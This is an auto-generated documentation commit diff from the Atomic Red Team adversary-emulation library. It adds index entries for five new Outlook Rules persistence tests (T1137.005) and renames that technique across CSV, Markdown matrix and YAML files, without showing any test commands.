Generated docs from job=generate-docs branch=master [ci skip]

2026-04-20 09:48:50 +00:00
parent 255b01a064
commit 168cde7f51
32 changed files with 1379 additions and 34 deletions
@@ -2,7 +2,7 @@

 # Atomic Red Team

-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1784-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1789-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)


 Atomic Red Team™ is a library of tests mapped to the
@@ -1185,6 +1185,11 @@ persistence,T1176,Browser Extensions,1,Chrome/Chromium (Developer Mode),3ecd790d
 persistence,T1176,Browser Extensions,2,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
 persistence,T1176,Browser Extensions,3,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
 persistence,T1176,Browser Extensions,4,Google Chrome Load Unpacked Extension With Command Line,7a714703-9f6b-461c-b06d-e6aeac650f27,powershell
+persistence,T1137.005,Office Application Startup: Outlook Rules,1,Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object,ffadc988-b682-4a68-bd7e-4803666be637,powershell
+persistence,T1137.005,Office Application Startup: Outlook Rules,2,Outlook Rule - Sender Address Trigger with DeletePermanently Action via COM Object,bddfd8d4-7687-4971-b611-50a537ab3ab4,powershell
+persistence,T1137.005,Office Application Startup: Outlook Rules,3,Outlook Rule - Auto-Forward Emails to External Address via COM Object,b0bd3d76-a57c-4699-83f4-8cd798dd09bd,powershell
+persistence,T1137.005,Office Application Startup: Outlook Rules,4,Outlook Rules - Enumerate Existing Rules via PowerShell COM Object,5ff5249a-5807-480e-ab52-c430497a8a25,powershell
+persistence,T1137.005,Office Application Startup: Outlook Rules,5,Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion),cb814cf8-24f2-41dc-a1cd-1c2073276d4a,powershell
 persistence,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
 persistence,T1546.011,Event Triggered Execution: Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
 persistence,T1546.011,Event Triggered Execution: Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
@@ -815,6 +815,11 @@ persistence,T1176,Browser Extensions,1,Chrome/Chromium (Developer Mode),3ecd790d
 persistence,T1176,Browser Extensions,2,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
 persistence,T1176,Browser Extensions,3,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
 persistence,T1176,Browser Extensions,4,Google Chrome Load Unpacked Extension With Command Line,7a714703-9f6b-461c-b06d-e6aeac650f27,powershell
+persistence,T1137.005,Office Application Startup: Outlook Rules,1,Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object,ffadc988-b682-4a68-bd7e-4803666be637,powershell
+persistence,T1137.005,Office Application Startup: Outlook Rules,2,Outlook Rule - Sender Address Trigger with DeletePermanently Action via COM Object,bddfd8d4-7687-4971-b611-50a537ab3ab4,powershell
+persistence,T1137.005,Office Application Startup: Outlook Rules,3,Outlook Rule - Auto-Forward Emails to External Address via COM Object,b0bd3d76-a57c-4699-83f4-8cd798dd09bd,powershell
+persistence,T1137.005,Office Application Startup: Outlook Rules,4,Outlook Rules - Enumerate Existing Rules via PowerShell COM Object,5ff5249a-5807-480e-ab52-c430497a8a25,powershell
+persistence,T1137.005,Office Application Startup: Outlook Rules,5,Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion),cb814cf8-24f2-41dc-a1cd-1c2073276d4a,powershell
 persistence,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
 persistence,T1546.011,Event Triggered Execution: Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
 persistence,T1546.011,Event Triggered Execution: Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
@@ -302,7 +302,7 @@
 - T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1505.005 Server Software Component: Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1176 Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.005 Office Application Startup: Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -80,7 +80,7 @@
 - T1137 Office Application Startup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098.003 Account Manipulation: Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1137.006 Office Application Startup: Add-ins [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.005 Office Application Startup: Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1137.001 Office Application Startup: Office Template Macros. [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -302,7 +302,7 @@
 - T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1505.005 Server Software Component: Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1176 Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.005 Office Application Startup: Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1593,7 +1593,12 @@
  - Atomic Test #2: Firefox [linux, windows, macos]
  - Atomic Test #3: Edge Chromium Addon - VPN [windows, macos]
  - Atomic Test #4: Google Chrome Load Unpacked Extension With Command Line [windows]
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1137.005 Office Application Startup: Outlook Rules](../../T1137.005/T1137.005.md)
+  - Atomic Test #1: Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object [windows]
+  - Atomic Test #2: Outlook Rule - Sender Address Trigger with DeletePermanently Action via COM Object [windows]
+  - Atomic Test #3: Outlook Rule - Auto-Forward Emails to External Address via COM Object [windows]
+  - Atomic Test #4: Outlook Rules - Enumerate Existing Rules via PowerShell COM Object [windows]
+  - Atomic Test #5: Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion) [windows]
 - T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
  - Atomic Test #1: Application Shim Installation [windows]
@@ -415,7 +415,7 @@
 - [T1176 Browser Extensions](../../T1176/T1176.md)
  - Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
  - Atomic Test #2: Firefox [linux, windows, macos]
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.005 Office Application Startup: Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -366,7 +366,7 @@
  - Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
  - Atomic Test #2: Firefox [linux, windows, macos]
  - Atomic Test #3: Edge Chromium Addon - VPN [windows, macos]
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.005 Office Application Startup: Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -83,7 +83,7 @@
 - T1137 Office Application Startup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098.003 Account Manipulation: Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1137.006 Office Application Startup: Add-ins [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.005 Office Application Startup: Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1137.001 Office Application Startup: Office Template Macros. [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1113,7 +1113,12 @@
  - Atomic Test #2: Firefox [linux, windows, macos]
  - Atomic Test #3: Edge Chromium Addon - VPN [windows, macos]
  - Atomic Test #4: Google Chrome Load Unpacked Extension With Command Line [windows]
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1137.005 Office Application Startup: Outlook Rules](../../T1137.005/T1137.005.md)
+  - Atomic Test #1: Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object [windows]
+  - Atomic Test #2: Outlook Rule - Sender Address Trigger with DeletePermanently Action via COM Object [windows]
+  - Atomic Test #3: Outlook Rule - Auto-Forward Emails to External Address via COM Object [windows]
+  - Atomic Test #4: Outlook Rules - Enumerate Existing Rules via PowerShell COM Object [windows]
+  - Atomic Test #5: Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion) [windows]
 - T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
  - Atomic Test #1: Application Shim Installation [windows]
@@ -32,7 +32,7 @@
 |  | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Escape to Host](../../T1611/T1611.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [System Network Connections Discovery](../../T1049/T1049.md) |  | [Email Collection: Email Forwarding Rule](../../T1114.003/T1114.003.md) |  | [Encrypted Channel](../../T1573/T1573.md) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [Inter-Process Communication](../../T1559/T1559.md) | [Browser Extensions](../../T1176/T1176.md) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | [Cloud Storage Object Discovery](../../T1619/T1619.md) |  | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) |  | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
-|  | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Log Enumeration](../../T1654/T1654.md) |  | [Data from Network Shared Drive](../../T1039/T1039.md) |  | [Non-Application Layer Protocol](../../T1095/T1095.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Outlook Rules](../../T1137.005/T1137.005.md) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Log Enumeration](../../T1654/T1654.md) |  | [Data from Network Shared Drive](../../T1039/T1039.md) |  | [Non-Application Layer Protocol](../../T1095/T1095.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [User Execution: Malicious Image](../../T1204.003/T1204.003.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Email Collection: Remote Email Collection](../../T1114.002/T1114.002.md) |  | Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
 |  | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | [Process Discovery](../../T1057/T1057.md) |  | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | Container CLI/API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Customer Relationship Management Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -25,7 +25,7 @@
 |  | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Video Capture](../../T1125/T1125.md) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
 |  | Malicious Copy and Paste [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | [Domain Trust Discovery](../../T1482/T1482.md) |  | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Discovery](../../T1083/T1083.md) |  | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Data Destruction](../../T1485/T1485.md) |
+|  | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Outlook Rules](../../T1137.005/T1137.005.md) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Discovery](../../T1083/T1083.md) |  | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Data Destruction](../../T1485/T1485.md) |
 |  | [System Services: Service Execution](../../T1569.002/T1569.002.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | [System Network Connections Discovery](../../T1049/T1049.md) |  | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) |  | Remote Access Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Hijack Execution Flow: DLL](../../T1574.001/T1574.001.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Data from Network Shared Drive](../../T1039/T1039.md) |  | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  |  | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Time Providers](../../T1547.003/T1547.003.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | [Log Enumeration](../../T1654/T1654.md) |  | Email Collection: Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Non-Standard Port](../../T1571/T1571.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
@@ -27968,7 +27968,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:48:41.026Z'
-      name: Outlook Rules
+      name: 'Office Application Startup: Outlook Rules'
      description: |-
        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)

@@ -27989,6 +27989,7 @@ persistence:
      - Windows
      - Office Suite
      x_mitre_version: '1.2'
+      identifier: T1137.005
    atomic_tests: []
  T1098.007:
    technique:
@@ -27835,7 +27835,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:48:41.026Z'
-      name: Outlook Rules
+      name: 'Office Application Startup: Outlook Rules'
      description: |-
        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)

@@ -27856,6 +27856,7 @@ persistence:
      - Windows
      - Office Suite
      x_mitre_version: '1.2'
+      identifier: T1137.005
    atomic_tests: []
  T1098.007:
    technique:
@@ -27154,7 +27154,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:48:41.026Z'
-      name: Outlook Rules
+      name: 'Office Application Startup: Outlook Rules'
      description: |-
        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)

@@ -27175,6 +27175,7 @@ persistence:
      - Windows
      - Office Suite
      x_mitre_version: '1.2'
+      identifier: T1137.005
    atomic_tests: []
  T1098.007:
    technique:
@@ -27270,7 +27270,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:48:41.026Z'
-      name: Outlook Rules
+      name: 'Office Application Startup: Outlook Rules'
      description: |-
        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)

@@ -27291,6 +27291,7 @@ persistence:
      - Windows
      - Office Suite
      x_mitre_version: '1.2'
+      identifier: T1137.005
    atomic_tests: []
  T1098.007:
    technique:
@@ -27154,7 +27154,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:48:41.026Z'
-      name: Outlook Rules
+      name: 'Office Application Startup: Outlook Rules'
      description: |-
        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)

@@ -27175,6 +27175,7 @@ persistence:
      - Windows
      - Office Suite
      x_mitre_version: '1.2'
+      identifier: T1137.005
    atomic_tests: []
  T1098.007:
    technique:
@@ -27838,7 +27838,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:48:41.026Z'
-      name: Outlook Rules
+      name: 'Office Application Startup: Outlook Rules'
      description: |-
        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)

@@ -27859,6 +27859,7 @@ persistence:
      - Windows
      - Office Suite
      x_mitre_version: '1.2'
+      identifier: T1137.005
    atomic_tests: []
  T1098.007:
    technique:
@@ -27617,7 +27617,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:48:41.026Z'
-      name: Outlook Rules
+      name: 'Office Application Startup: Outlook Rules'
      description: |-
